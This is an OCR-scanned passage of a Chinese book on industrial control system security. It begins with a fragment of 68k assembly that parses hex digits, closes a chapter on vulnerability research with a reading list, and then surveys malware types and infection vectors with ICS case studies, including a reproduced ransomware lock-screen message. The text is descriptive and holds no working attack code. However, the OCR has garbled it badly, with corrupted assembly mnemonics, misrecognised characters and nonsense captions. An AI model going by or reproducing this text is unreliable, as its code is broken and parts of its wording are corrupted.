bge.s .lower 


moved H#'F', d2 
cmp. 1 d2, dl 
bgt.s .done 
moveg #'A', d2 
cmp. dl d2, dl 
bge.s .higher 
moveq #'9', d2 
cmo. l d2, dl 
bgt.s .done 
. number 
subi.l #'0',d1 
bra.s .Sum 
.higher 
subi.l #55,d1 
bra.s .sum 
. Lower 
subi.l #87,d1 
. SUM 
ls1.1 #4, do 
add.] dl,d0 
jmp .digit 
.done: 
rts 
END START 
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使 用 本 章 中 讨论 的 工具 和 技术 ， 再 进行 一 些 实践 ， 了 解 些 相关 内 容 ， 读 者 就 可 以 自行 开展 工控 系统 安全 的 研究 工作 了 。 开 展 独 立 研究 是 尽早 获取 关于 工控 系 
统 软件 和 设备 漏洞 关键 信息 的 一 种 好 方法 ， 从 而 也 就 无 需 再 依赖 其 他 研究 人 员 的 研究 成 果 和 信息 披露 。 以 下 是 对 一 个 工控 系统 漏洞 研究 项 目 所 涉及 领域 的 一 个 快 
速 回 顾 : 


模拟 攻击 者 的 思维 模式 : 像 攻击 者 一 样 思考 能 够 揭示 攻击 者 需要 查找 哪些 信息 。 
. 模糊 测试 : 在 一 定 程度 上 提高 了 漏洞 挖 据 过 程 的 自动 化 程度 ， 从 而 节省 时 间 和 人 金钱， 并 指导 将 精力 投入 到 更 可 能 产 出 成 果 的 目标 领域 。 


. 静态 二 进 制 分 析 : 对 目标 代码 进行 深入 分 析 ， 以 发 现 逻 辑 缺陷 及 系统 之 间 信 任 错 位 所 导致 的 漏洞 。 


. 动态 二 进 制 分 析 : 通过 观察 目标 程序 运行 时 的 行为 ， 对 静态 二 进 制 分 析 过 程 中 发 现 的 结果 进行 进一步 拓展 。 


` 漏洞 利用 代码 的 PoC: 一 旦 挖掘 出 漏洞 ， 需 要 开发 漏洞 利用 工具 来 演示 漏洞 的 严重 程度 ， 从 而 更 容易 说 服 人 们 进行 漏洞 修复 ， 使 人 们 不 再 拘泥 于 漏洞 “ 影 
响 有 多 大 ”的 讨论 ， 从 而 可 以 直观 地 感受 漏洞 的 执行 效果 。 


7.9 延伸 阅读 


e BitBlaze: Binary Analysis for Computer Security (http://bitblaze.cs.berkeley.edu) 
e AppCheck (http://www.codenomicon.com/products/appcheck/ ) 

e Veracode (http://www.veracode.com/products/) 

。 Defensics (http://www.codenomicon.com/products/defensics/) 

e Aegis Fuzzer (http://www.automatak.com) 

e IDA Pro (www.hex-rays.com/products/ida/) 

e Peach Fuzzer (www.peachfuzzer.com) 

e OllyDbg (http://ollydbg.de) 

e Binwalk (http://binwalk.org/) 


7.9.2 一 般 文献 
e The Shelicoder’s Handbook: Discovering and Exploiting Security Holes, by Chris Anley, 
John Heasman, Felix Lindner, and Gerardo Richarte (Wiley, 2007) 
e Reversing: Secrets of Reverse Engineering, by Eldad Eilam (Wiley, 2005) 


e The IDA Pro Book: The Unofficial Guide to the World’s Most Popular Disassembler, 
2 Edition, by Chris Eagle (No Starch Press, 2011) 


e Gray Hat Python: Python Programming for Hackers and Reverse Engineers, 1“ Edition 
by Justin Seitz (No Starch Press, 2009) 


e Fuzzing: Brute Force Vulnerability Discovery, by Michael Sutton, Adam Greene, 
and Pedram Amini (Artec House, 2008) 


o Fuzzing for Software Security Testing and Quality Assurance, by Ari Takanen, 
Jared DeMott, and Charlie Miller (Artec House, 2008) 


or GSAS 


恶意 软件 ， 又 称 之 为 恶意 代码 (malicious code， 通 常 简写 为 malware) ， 对 于 众多 计算 机 系统 以 及 它们 的 用 户 而 言 都 是 挥 之 不 去 的 梦 寿 。 不 幸 的 是 ， 同 样 
类 型 的 威胁 也 可 以 针对 工控 系统 中 的 设备 ， 并 带 来 相同 的 影响 。 本 章 对 恶意 代码 的 类 型 及 恶意 代码 所 使 用 的 机 制 进行 概述 ， 然 后 对 工控 系统 相关 的 恶意 代码 进行 
剖析 ， 并 对 其 分 析 方 法 进行 了 介绍 。 对 于 有 意 就 工控 系统 恶意 代码 进行 深入 探讨 的 读者 可 参阅 8.4 节 中 的 延伸 阅读 材料 。 


8.1 ”工控 系统 恶意 代码 入 站 


从 传统 的 角度 来 看 ， 逐 步 演 化 的 恶意 代码 已 经 能 够 实现 多 种 不 同 的 功能 。 例 如 ， 一 段 恶意 代码 可 以 通过 不 同 的 协议 与 很 多 指控 服务 器 (C&C) 进行 通信 。 而 
同一 款 恶 意 代 码 还 可 以 通过 多 个 不 同 的 协议 感染 网 络 中 的 其 他 主机 。 根 据 恶意 代码 的 不 同行 为 模式 ， 可 以 分 为 四 种 恶意 代码 感染 层次 ， 如 图 8-1 所 示 。 

多 种 类 型 的 恶意 代码 都 会 所 及 计算 机 系统 的 安全 。 而 又 由 于 恶意 代码 具有 多 种 特性 ， 因 此 有 时 难以 确定 某 段 恶意 代码 到 旗 算 是 哪 种 类 型 。 本 章 试图 涵 兰 恶意 
代码 的 不 同类 型 以 及 不 同 的 感染 方式 ， 并 借助 现实 环境 、 仿 真 环境 中 的 案例 研究 来 展示 这 些 威胁 的 工作 方式 及 其 如 何 对 9CADA 环 境 造成 影响 。 


8.1.1 代码 释放 器 

1. 代 码 释 放 器 简介 

将 代码 释放 器 (Dropper) 列 入 恶意 代码 是 因为 在 感染 机 器 的 过 程 中 代码 释放 器 应 用 普遍 且 富 有 成 效 。 代 码 释放 器 的 设计 初衷 是 在 目标 主机 安 妆 恶意 代码 ， 
这 一 过 程 可 能 涉及 多 个 阶段 。 代 码 释 放 器 可 以 分 为 单 阶段 代码 释放 器 与 双 阶 段 代 码 释 放 器 。 单 阶段 代码 释放 器 发 挥 作用 只 需要 一 个 步骤 ， 即 恶意 代码 包含 在 单个 


文件 (代码 释放 器 文件 ) 中 。 双 阶段 代码 释放 器 即 代 码 释 放 器 采用 两 个 动作 才能 够 触 友 恶意 代码 。 例 如 ， 代 码 释 放 器 首先 感染 服务 器 并 被 成 功 触 友 ， 此 时 代码 释 
放 器 才能 够 从 指控 服务 器 上 下 载 工 具 集 。 


进入 目标 环境 的 机 制 


恶意 代码 的 分 发 与 传播 


对 目标 机 天 进行 探测 与 分 析 以 查找 可 以 利用 的 漏洞 


将 恶意 代码 艇 人 操作 系统 、 应 用 程序 或 者 网 络 设备 ”恶意 代码 回 连 攻击 者 ， 等 符 进 一 步 指 令 


图 8-1 恶意 代码 感染 层次 


代码 释放 器 可 以 分 为 三 类 。 第 一 种 类 型 是 能 够 利用 计算 机 漏洞 的 代码 释放 器 ， 例 如 运行 在 Windows XP 操作 系统 中 未 打 补 丁 的 人 机 界面 。 第 二 种 类 型 是 需 
同 攻击 者 进行 某 种 交互 的 代码 释放 器 ， 例 如 通过 鱼 叉 式 网 络 钓鱼 邮件 渗透 目标 计算 机 的 代码 释放 器 。 第 三 种 类 型 则 是 指 第 一 种 类 型 与 第 二 种 类 型 相 结 合 的 代码 释 
放 器 ， 例 如 一 封 以 Word 文 档 为 附件 的 鱼 叉 式 网 络 钓鱼 邮件 ， 其 中 Word 文 档 中 包含 了 CVE-2012-0158 漏 洞 利用 代码 。 代 码 释放 器 的 功能 如 图 8-2 所 示 。 


工具 集 或 其 他 
恶意 代码 ( 可 选 ) 


{US Eat 


带 内 漏洞 利用 工具 


图 8-2 代码 释放 器 的 功能 


2. 代 码 释 放 器 案例 研究 


当前 ， 很 多 APT 攻 击 (高 级 可 持续 威胁 ，Advanced Persistent Threat) 均 需 借助 某 种 类 型 的 代码 释放 器 ， 这 融 使 得 安全 防御 措施 捕获 执行 中 代码 释放 器 的 
行为 更 加 困难 。 


竺 影响 工控 系统 环境 安全 的 众多 代码 释放 器 实例 中 ，Laziok 有 恶意 代码 就 是 其 中 之 一 。Laziok 是 一 款 针对 中 东 能 源 公 司 的 恶意 代码 ， 由 Symantec 公司 于 2015 
年 初 首 先 发 现 (http://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector) 。 这 里 选择 Laziok 有 恶意 代 
码 ， 其 原因 在 于 该 恶意 代码 具有 代码 释放 器 的 功能 ， 而 且 可 能 会 对 被 攻击 者 的 工控 设备 造成 影响 。Laziok 主 要 通过 垃圾 邮件 感染 被 攻击 者 。 在 部 分 攻击 实例 中 ， 
代码 释放 器 主要 用 于 释放 攻击 工具 集 ， 这 样 一 旦 攻击 者 进入 网 络 内 部 就 可 以 利用 释放 出 的 工具 集 进行 其 他 操作 。 


8.1.2 Rootkits 


1.Rootkits 简 介 


Rootkits 是 我 们 首先 进行 归 类 的 悉 意 代码 。Rootkits 被 看 作 是 信息 安全 世界 中 复杂 程度 较 高 的 恶意 代码 之 一 。 对 于 试图 在 一 段 较 长 的 时 间 内 驻 留 在 目标 机 器 内 
的 有 恶意 代码 ， 都 可 以 将 其 归 为 Rootkits。 除 了 能 够 持续 驻 留 在 主机 中 ，Rootkits 通 常 还 利用 反 病 毒 引 擎 对 抗 技 术 方式 来 规避 检测 。Rootkits 通 常 需要 获取 被 感染 主 
机 的 root 或 者 admin 权 限 ， 这 也 是 Rootkits 之 所 以 得 名 的 原因 。 


Rootkits 主 要 分 为 两 类 ， 内 核 态 Rootkits 和 用 户 态 Rootkits，Rootkits 的 类 型 不 同 ， 其 功能 也 有 所 区 别 。 用 户 态 Rootkits 要 么 算 改 被 感染 主机 中 的 应 用 程序 或 
者 二 进 制 文件 ， 要 么 算 改 被 感染 主机 中 的 库 文件 。 与 之 相对 ， 内 核 态 Rootkits 则 深入 了 到 操作 系统 的 心脏 一 内 核 。 


由 于 Rootkits 利 用 了 操作 系统 中 的 高 级 特性 ， 散 入 到 了 操作 系统 内 部 ， 因 此 在 多 个 层面 上 令 人 大 伤 脑筋 。 但 它们 的 主要 功能 是 通过 复 改 操作 系统 的 命令 、 日 
志 以 及 相关 数据 结构 来 实现 恶意 行为 的 隐藏 。 


2.Rootkits 案 例 研究 


BlackEnergy (黑暗 力量 ) 最 初 被 归 为 恶意 代码 中 的 犯罪 软件 类 型 。 其 主要 功能 是 进行 信息 窃取 ， 为 攻击 者 提取 系统 信息 。 但 是 ，BlackEnergy 随 后 慢 慢 增加 
了 一 些 更 为 高 级 的 功能 ， 其 中 包括 具有 用 户 态 及 内 核 态 Rootkit 的 功能 。 也 正 因为 BlackEnergy 的 功能 更 加 先进 ， 因 此 被 用 于 有 针对 性 的 恶意 代码 攻击 。 不 幸 的 
是 ，BlackEnergy 也 开始 针对 广泛 使 用 SCADA 设 备 的 环境 。Sandworm 团 队 曾 经 利用 BlackEnergy 有 的 放 矢 地 攻击 了 几 家 SCADA 人 机 界面 制造 商 ， 该 团队 很 有 可 
能 是 一 文具 有 国家 支持 背景 的 攻击 团队 ， 下 列 几 份 报告 对 此 进行 了 介绍 : 


“BlackEnerey Crimeware Coursing Through US Control Systems , ” by Darren Pauli, The 


Register, October29, 2014 (http://www.theregister.co.uk/2014/10/29/blackenergy_crimeware_pwning_us_control_systems_cert_wartns/) 


- Sandworm Team Targeting SCADA Systems, by John Holtquist, iSight Partners, October21, 2014 (http://www. isightpartners.com/2014/10/sandworm-team- 


targeting-scada-systems / ) 
+ “Sandworm to Blacken: The SCADA Connection, Kyle Wilhoit and Jim Gogolinski, TrendLabs Security Intelligence 


Blog, October16, 2014 (http://blog.trendmicto.com/trendlabs-security-intelligence/sandworm-to-blacken-the-scadaconnection/ ) 


8.1.3 ”病毒 


1. 病 毒 简介 


第 一 款 计 算 机 病毒 于 1986 年 出 现 ， 绰 号 叫 作 Brain。Brain 昌 然 是 第 一 款 公 开 对 外 发布 的 病毒 ， 但 是 病毒 的 核心 思想 已 经 得 到 了 完整 体现 。 简 单 来 说 ， 病 毒 是 
一 种 能 够 自我 复制 的 恶意 代码 ， 它 将 自己 附加 到 其 他 程序 之 上 ， 并 且 为 了 感染 目标 系统 能 够 同 用 户 进行 一 定 程度 的 交互 。 这 种 定义 较为 松散 ， 但 是 非常 准确 。 


虽然 计算 机 病毒 特别 讨厌 ， 但 是 它们 还 需要 同 用 户 进 行 某 种 程度 的 交互 ， 主 要 是 当 攻 击 者 试图 渗透 被 攻击 者 的 机 器 时 。 病 毒 能 够 在 被 攻击 者 的 主机 中 对 从 引 
导 导 区 到 可 移动 介质 ， 再 到 二 进 制 文件 的 多 个 不 同位 置 进行 感染 。 融 像 本 章 所 提 到 的 其 他 形式 的 恶意 代码 一 样 ， 病 毒 同样 会 对 工控 系统 网 络 与 设备 造成 影响 。 


2. 病 毒 案 例 研究 


最 近 ， 一 家 大 型 能 源 公司 感染 了 恶意 代码 ， 该 恶意 代码 通过 一 个 被 感染 的 USB 设 备 进 入 到 了 同 互联 网 物理 隔离 的 控制 网 络 。 这 款 恶 意 代码 即 Rombertik 病 毒 
(https://blogs.cisco.com/security/talos/rombertik) 。 虽 然 Rombertik 病 毒 并 不 是 直接 针对 该 能 源 公 司 开发 的 ， 但 是 它 能 够 删除 关键 的 Windows 文 件 ， 从 而 
造成 机 器 不 断 重启 。 在 此 次 攻击 中 ， 由 于 Rombertik 病 毒 造成 机 器 不 断 重启 ， 导 致 4 套 人 机 界面 以 及 2 套 工 业 实时 历史 数据 库 中 的 数据 被 完全 擦 除 。 最 近 出 现 的 第 
二 起 Rombertik 病 毒 感染 事件 中 ， 一 家 大 型 石油 公司 遭受 了 鱼 叉 式 网 络 钓鱼 邮件 攻击 。 该 次 攻击 中 ， 同 样 由 Rombertik 病 毒 导致 系统 不 断 重 局 ， 造 成 超过 15 套 的 
人 机 界面 被 完全 格式 化 。 


不 幸 的 是 ,很 多 组 织 机 构 虽 然 只 是 不 经 意 间 感染 了 病毒 及 恶意 代码 ， 但 是 它们 由 此 遗 受 的 破坏 却 可 能 是 灾难 性 的 。 


8.1.4 广告 软件 与 间谍 程序 


1. 广 告 软件 与 间谍 程序 简介 


广告 软件 ,或 者 说 是 广告 支持 软件 (advertising-supporting software) ， 是 一 种 通过 自动 播放 广告 的 方式 帮助 恶意 代码 的 广告 商 或 开发 者 御 取 利益 的 恶意 
代码 。 广 告 的 显示 方式 既 包 括 在 软件 自身 界面 中 显示 ， 也 可 以 借助 Web 浏 览 器 显示 ， 还 可 以 借助 操作 系统 中 的 弹出 窗口 或 者 “不 可 天 闭 的 窗口 ”进行 显示 。 大 多 
数 广 告 软件 被 分 类 为 恶意 代码 时 ， 会 使 用 间谍 软件 或 者 其 他 软件 采集 用 户 个 人 信息 。 


2. 广 告 软件 与 间谍 软件 案例 研究 


令 人 遗憾 的 是 ， 通 弟 在 某 个 机 构 的 整个 基础 设施 中 都 会 安装 有 广告 软件 ， 这 些 广告 软 件 是 在 用 户 部 署 解决 某 一 弟 规 需求 的 应 用 程序 时 安 半 的 。 但 是 这 些 应 用 
程序 也 都 有 着 “阴暗 ”的 一 面 ， 类 似 于 BitTorrent 客 户 端 。 已 经 发 现 有 一 些 BitTorrent 客 户 端 在 自身 安装 完成 之 后 会 进行 广告 软件 或 者 间谍 软件 的 安装 。 虽 然 这 似 
平 不 是 一 个 值得 关注 的 问题 ， 但 是 有 报告 指出 通过 伪 六 为 常规 软件 ， 已 经 有 广告 软件 及 间谍 软件 安装 进 了 控制 网 络 。 而 这 些 广告 软件 或 间谍 软件 最 终 可 能 中 断 所 
在 控制 网 络 中 机 器 的 运行 ， 或 者 在 机 器 重建 或 清理 恶意 代码 时 导致 信息 泄露 与 系统 停机 。 


8.1.5 WER 


1. 蠕 虫 简介 


蠕虫 是 一 种 已 经 存在 多 年 的 典型 恶意 软件 。 蠕 虫 的 主要 功能 是 自我 复制 。 其 自我 复制 通常 借助 两 种 方法 实现 : 计算 机 网 络 和 类 似 于 U 盘 的 可 移动 介质 。 蠕 虫 的 
独特 之 处 在 于 ， 它 无 须 附加 到 已 有 的 程序 束 能 正常 工作 。 蠕 虫 可 以 完全 独立 于 任何 应 用 程序 运行 。 借 助 网 络 ， 里 虫 的 影响 可 更 加 深远 。 几 乎 所 有 在 网 络 中 传播 的 
蠕虫 都 会 导致 网 络 延 迟 ， 从 而 影响 控制 网 络 中 远程 操作 的 正常 进行 。 


通常 ， 里 虫 与 某 种 攻击 载 从 一 起 使 用 。 蠕 虫 主要 用 于 传播 ， 而 其 所 释放 的 攻击 载 谷 则 对 机 器 进行 感染 ， 并 且 可 能 用 于 维持 持久 连接 ， 直 到 攻击 者 访问 被 感染 
的 机 器 。 这 使 得 蠕虫 具有 模块 化 特性 ， 并 且 更 加 难以 追踪 。 


2. 蜂 虫 案例 研究 


同 广告 软件 和 间谍 软件 类 似 ， 蠕 虫 遍 布 当今 世界 的 大 多 数 网 络 。 然 而 ， 如 果 蠕 虫 在 整个 控制 系统 网 络 中 传播 ， 可 能 导致 控制 系统 网 络 出 现 灾 难 性 的 中 断 。 最 
近 ， 被 看 作 是 最 成 功 蠕虫 的 Conficker 束 感染 了 一 家 位 于 美国 东海 岸 的 大 型 制造 业 公司 的 控制 网 络 ， 并 在 其 中 广泛 传播 。 时 至 今日 ， 虽 然 Conficker 蜂 虫 已 经 略 显 
过 时 ， 但 是 由 于 它 不 仪 能够 释放 攻击 载 倚 ， 并 且 能 够 在 传播 期 间 耗 费 大 量 资 源 从 而 导致 拒绝 服务 攻击 ， 所 以 仍然 能 够 成 功 地 发 起 攻击 。 在 上 述 实 例 中 ，Conficker 
蠕虫 攻陷 了 整个 控制 系统 网 络 ， 并 且 在 传播 过 程 中 无 意 拿 下 了 包括 路 由 器 和 交换 机 在 内 的 基础 设施 。 尽 管 Conficker 蜂 虫 并 不 是 专门 针对 控制 系统 网 络 所 开发 的 ， 
但 由 于 它 耗 费 了 大 量 资 源 ， 所 以 依然 会 导致 系统 中 渐 。 


8.1.6 AY 


1. 木 马 简 介 


特洛伊 木马 的 故事 源 于 希腊 神话 中 的 特洛伊 战争 ， 和 希腊 人 建造 了 一 具 巨 大 的 中 空 木马 ， 挑 选 一 队 士兵 隐藏 其 中 ， 然 后 假装 撤退 把 木马 留 在 特洛伊 城 门 之 外 。 
而 特洛伊 人 把 木马 当成 战利品 拉 进 了 特洛伊 城 的 城 门 。 夜 晚 ， 当 特洛伊 城中 的 人 们 熟睡 之 时 ， 藏 在 木马 中 的 士兵 突然 出 现 ， 出 其 不 意 地 对 强大 的 政 人 发起 了 攻 
击 。 


被 称 为 木马 的 恶意 代码 同 与 其 同名 的 希腊 神话 相 类 似 。 木 马 (Trojan Horse 或 Trojan) 是 将 自己 伪 闭 成 合法 应 用 程序 的 恶意 代码 ， 以 期 能 够 诱骗 受害 者 安装 
自己。 木马 一 旦 完成 安装， 融会 表现 出 其 真实 意图 ， 开 始 对 系统 进行 感染 并 在 系统 间 进 行 传播 。 木 马 的 最 终 目标 包括 : 


` 破坏 系统 ”表现 为 清除 机 器 中 的 数据 ， 或 者 导致 针对 网 络 或 者 主机 发 起 拒绝 服务 攻击 。 


消耗 资源 有 时 木马 无 论 是 有 意 为 之 还 是 无 意 为 之 都 会 导致 资源 消耗 问题 ， 很 可 能 导致 网 络 与 (或 ) 主机 的 中 断 。 近 期 ， 木 马 还 被 用 来 挖掘 诸如 比特 币 之 
KY oe BP, VA Waa FF. 


- 窃取 信息 “木马 的 另 一 个 作用 是 信息 窃取 。 在 最 近 的 几 个 木马 攻击 实例 中 ， 木 马 还 会 在 主机 中 安装 勒索 软件 ， 受 害 者 支付 赎金 后 才能 取 回 自己 的 数据 。 而 
勒索 软件 可 能 由 伪造 的 反 病 毒 产 品 释 放 得 到 ， 虽 然 这 些 软件 看 起 来 是 正常 的 程序 ， 但 事实 却 并 非 如 此 ， 如 图 8-3 所 示 。 


Personal Antivirus 


Security is at risk! Protection disabled 


Computer automatic protection agaist viruses and other security threats not found 


Protection: Low 


dh Virus protection Not Found 
db Spyware protection Not Found 
@ Windows Protection Not Found 
db Automatic update (Last Update 03/15/2009 Not Found 


Recommended: Cick “Protect PC” to l 
protect your PC A Protect PC Now 


T \ Application status: Trial 


Your security 
status: At Risk Application version 


Database version 


Enter activation key License expiry date: Get license key 


Action: Main window ra) Database: 2.4.2.5 12/24/2008 Update OS: Windows XP RAM: 1323 MBytes 


图 8-3 ”木马 将 自身 伪装 成 伪造 的 反 病 毒 程序 


监控 与 (或) 开展 间谍 活动 ”对 受害 者 进行 监控 并 开展 间谍 活动 的 木马 其 主要 目的 在 于 窃取 数据 或 信息 。 攻 击 者 可 能 是 在 寻找 商业 秘密 、 财 务 信息 又 或 者 
是 个 人 身份 信息 。 同 样 ， 攻 击 者 也 可 以 在 此 阶段 将 其 他 工具 与 木马 相 结合 ， 例 如 键盘 记录 器 、 网 络 摄像 头 记 录 软 件 以 及 远程 控制 代码 。 在 某 些 情况 下 ， 这 些 工具 
也 都 可 以 内 置 到 木马 当中 ， 从 而 无 须 再 次 下 载 ， 也 不 用 借助 其 他 工具 即 可 展开 无 颖 攻击 。 


2. 木 马 案例 研究 


木马 非常 讨厌 ， 因 为 它们 会 轻易 地 欺骗 那些 对 恶意 代码 安装 细节 不 甚 了 解 的 终端 用 户 。2014 年 1 月 ， 几 款 木马 伪装 成 了 有 效 的 人 机 界面 软件 包 和 项 目 文件 。 
这 些 特定 木马 能 够 对 包括 Cimplicity、Advantech 及 WinCC 在 内 的 应 用 程序 以 及 应 用 上 述 程序 的 工控 项 目 产 生 影响 。 木 马 执行 时 ， 会 释放 一 连 串 意图 窃取 银行 认 
证 信息 的 恶意 代码 。 虽 然 这 不 会 直接 对 控制 网 络 造 成 影响 ， 但 它 确实 会 导致 组 织 机 构 内 部 的 计 费 系统 出 现 问题 。 


勒 奈 软件 (Ransomware) 是 一 种 通过 限制 受害 者 访问 感染 勒索 软件 的 计算 机 ， 继 而 向 受害 者 索要 赎金 的 恶意 代码 。 而 用 户 重新 获取 访问 计算 机 权限 的 唯一 
方法 就 是 支付 赎金 ， 金 额 通常 在 100 ~ 2000 美 元 之 间 ， 如 图 8-4 所 示 。 大 多 数 勒 这 软件 对 其 感染 的 硬盘 驱动 器 中 的 内 容 进行 了 加 密 ， 只 有 在 受害 者 支付 赎金 后 攻击 
者 才 会 赋予 受害 者 访问 权限 。 估 计 是 由 于 攻击 者 大 多 都 成 功 收 到 了 赎金 ， 所 以 自 2013 年 以 来 ， 勒 索 软 件 逐 渐变 得 越 来 越 流行 。 


This operating system is locked due to the violation of the federal laws of 
the United States of America! (Article 1, Section 8, Clause 8; Article 202; 
Article 210 of the Criminal Code of U.S.A. provides for a deprivation of 
liberty for four to twelve years.) 

Following violations were detected: 

Your IP address was used to visit websites containing pornography, child 
pornography, zoophilia and child abuse. Your computer also contains 
video files with pornographic content, elements of violence and child 
pornography! Spam-messages with terrorist motives were also sent from 
your computer. 

This computer lock is aimed to stop your illegal activity. 


To unlock the computer you are obliged to pay a fine of $200. 


You have 72 hours to pay the fine, otherwise you will be arrested. 


You must pay the fine through 

To pay the fine, you should enter the digits resulting code, which is 
located on the back of your in the payment form and press 
OK (if you have several codes, enter them one after the other and press 


图 8-4 AMEAPA, MRAGRAN RA AAR 


控制 网 络 中 的 勒索 软件 是 一 类 尤其 令 人 厌恶 的 恶意 代码 。 这 并 不 是 因为 勒 泰 软件 同 其 他 恶意 代码 类 型 相 比 对 受害 者 机 器 的 影响 更 大 ， 而 是 因为 勒索 软件 使 得 
用 户 不 得 不 在 化 钱 缴纳 赎金 与 重新 格式 化 机 器 之 间 做 出 抉择 。 想 象 一 下 ， 在 为 制造 商 的 传送 市 提供 天 键 服务 的 人 机 界面 上 出 现 勒 索 软 件 的 场景 。 不 笠 的 是 ， 这 样 
的 场景 并 非 来 自 腾 想 。2013 年 年 底 的 一 份 报告 指出 ， 在 一 家 矿业 公司 的 基础 设施 中 发 现 了 勒索 软件 的 传播 ， 该 勒 床 软件 感染 了 控制 网 络 中 的 四 台 机 器 。 在 当时 的 
情况 下 ,该 矿业 公司 由 于 没有 保存 可 用 于 回 滚 操 作 的 备份 镜像 ， 操 作 员 不 得 不 支付 了 超过 1000 美 元 的 赎金 以 重新 获得 对 人 机 界面 的 访问 权限 。 最 后 ， 操 作 员 在 支 
付 赎金 后 再 次 获得 了 访问 权限 ， 但 是 他 的 银行 账户 也 少 了 1000 美 元 。 


即便 不 是 在 控制 网 络 环境 下 ， 有 恶意 代码 也 是 或 需 处 理 的 顽疾 。 恶 意 代码 必须 设法 以 某 种 方式 才能 进入 到 这 些 环境 中 。 这 正 是 感染 途径 友 挥 作用 的 地 方 。 理 解 
感染 途径 对 于 主动 保护 机 构 免 遭 恶 意 代码 的 攻击 非常 重要 。 感 染 途 径 大 致 可 以 分 为 四 类 ， 各 有 各 的 玉 手 之 处 。 虽然 我 们 没有 对 所 有 可 用 的 感染 途径 进行 介绍 ， 但 
是 此 处 列 出 的 四 类 感染 途径 同 工 控 系 统 环境 的 联系 最 为 紧密 。 


网 站 挂 马 攻 击 (Drive-by Download) 通 弟 被 视 为 一 种 基于 Web 的 攻击 ， 主 要 针对 浏览 包含 恶意 代码 的 网 站 的 用 户 。 许 多 时 候 ， 网 站 挂 马 攻击 借助 合法 网 站 
予以 实现 ， 而 这 些 合法 网 站 通 弟 已 遭受 漏洞 攻击 并 密植 入 了 恶意 代码 。 在 其 他 情况 下 ， 网 站 中 的 有 恶意 代码 会 将 受害 者 重 定 向 到 攻击 者 控制 的 Web 页 面 ， 从 而 使 攻 
击 者 能 够 执行 其 他 恶意 代码 或 命令 。 


水 坑 (watering hole) ， 原 指 动物 在 长 期 干旱 缺 水 季节 饮水 的 位 置 ， 常 见于 非洲 大 草原 中 。 现 在 也 指 人 们 聚会 社交 的 酒吧 。 而 计算 机 安全 中 的 水 坑 攻击 
(watering hole attack) ， 则 是 指 攻击 者 为 了 对 访问 某 特定 网 站 的 用 户 进 行 攻 击 ， 从 而 入 侵 某 特定 网 站 。 从 外 观 上 看 ， 网 站 在 被 入 侵 前 后 是 完全 一 样 的 。 例 
如 ， 攻 击 者 为 了 感染 所 有 访问 Siemens 网 站 的 用 户 ， 尝 试 入 侵 Siemens 网 站 ， 而 其 最 终 目 标 是 感染 安装 有 Siemens 软 件 的 人 机 界面 。 由 于 在 水 坑 攻 击 中 ， 攻 击 者 

试图 对 访问 特定 网 站 的 特定 用 户 群体 展开 攻击 ， 因 此 水 坑 攻 击 通 常 被 看 作 具 有 更 强 的 针对 性 。 


3. 网 络 钓鱼 和 鱼 叉 式 网 络 钓鱼 攻击 


网 络 钓鱼 和 鱼 叉 式 网 络 钓鱼 在 攻击 类 型 方面 非常 相似 。 它 们 的 区 别 在 于 各 自 所 针对 的 目标 不 同 。 网 络 钓鱼 (Phishing) 通常 被 认为 是 受众 广泛 的 试探 性 攻 
击 。 它 通常 将 技术 性 欺骗 与 社会 工程 学 相 结 合 ， 诱 骗 用 户 点 击 链 接 。 钓 鱼 者 通常 试图 确定 个 人 的 相关 信息 ， 例 如 银行 认证 信息 以 及 其 他 敏感 信息 。 


鱼 又 式 网 络 钓 鱼 同 网 络 钓 鱼 类 似 ， 但 是 针对 性 更 强 。 鱼 叉 式 网 络 钓鱼 (Spear phishing) 通常 针对 特定 组 织 中 的 特定 个 人 或 群体 。 构 造 鱼 又 式 网 络 钓鱼 邮件 
所 耗费 的 时 间 长 短 不 一 ， 但 是 攻击 者 通常 借助 社交 媒体 网 站 以 及 其 他 公开 可 用 的 数据 源 来 加 深 对 受害 者 的 了 解 。 由 于 攻击 者 对 社交 工程 学 和 漏洞 利用 的 依赖 ， 所 
以 鱼 叉 式 网 络 钓 鱼 经 常 也 被 看 作 等 同 于 APT 的 攻击 活动 。 


4.Web 渗 透 攻 击 


Web 渗 透 攻 击 通 常 涵盖 了 一 大 类 攻击 类 型 ， 其 中 包括 跨 站 脚本 攻击 (XSS) 、SQL 注 入 攻击 以 及 包含 漏洞 攻击 。 由 于 它们 都 同 恶 意 代码 有 关 ， 本 节 分 别 对 上 
面 提 及 的 三 种 攻击 类 型 进行 介绍 。 

(1) 跨 站 脚本 攻击 (XSS) 

简 而 言 之 ， 跨 站 脚本 (已 在 第 6 章 中 讨论 ) 是 一 种 在 未 授权 的 情况 下 针对 网 站 或 者 Web 页 面 的 脚本 注入 攻击 。 如 果 Web 页 面 中 存在 XSS 漏 洞 ， 攻 击 者 可 以 构造 


恶意 代码 ， 使 其 在 其 他 访问 者 打开 同一 Web 页 面 时 予以 执行 。Web 开 有 友人 员 没 有 遵循 安全 的 编码 规范 是 导致 这 些 漏洞 存在 的 主要 原因 。 图 8-5 展 示 了 一 个 简单 的 
XSS 攻 击 。 


访问 


注入 脚本 


图 8-5 ”简单 的 XSS 攻 击 概览 


(2) SQL 注入 攻击 (SQLi) 


当前 很 多 网 站 采用 SQL 数据 库 作 为 后 端 数据 库 并 人 存储 数据 。 由 于 数据 库 中 人 存储 了 大 量 有 价值 的 信息 ， 因 此 许多 攻击 者 尝试 获取 这 些 数 据 库 的 访问 权限 。 同 样 
由 于 Web 开 发 人 员 没 有 遵循 安全 的 编码 规范 ，SQL 注 入 攻击 (SQLi) (已 在 第 6 草 中 讨论 ) 利用 了 这 一 点 ， 从 而 使 得 攻击 者 能 够 执行 恶意 3QL 命 令 。 通 第 ，SQLi 攻 
击 利用 搜索 框 和 登录 框 来 传递 恶意 3QL 命 令 。 攻 击 者 使 用 SQL 注入 漏洞 来 确定 用 户 名 、 口 令 以 及 其 他 关于 用 户 和 保存 这 些 内 容 的 组 织 的 相 天 信息 。 图 8-6 对 SQLi 攻 
击 进行 了 刻画 。 


有 效 请 求 恶意 请 求 


WebHR #5 


Web) HIRIS ir 


SQL 数据 库 


图 8-6 ”简单 的 SQL 注入 攻击 概览 


(3) 包含 漏洞 攻击 


文件 包含 漏洞 主要 针对 PHP 语 言 中 的 include 参 数 ，PHP 是 一 种 常用 的 服务 器 新 脚本 语言 。 借 助 文件 包含 漏洞 ， 攻 击 者 能 够 实现 对 某 一 Web 页 面 所 访问 文件 之 
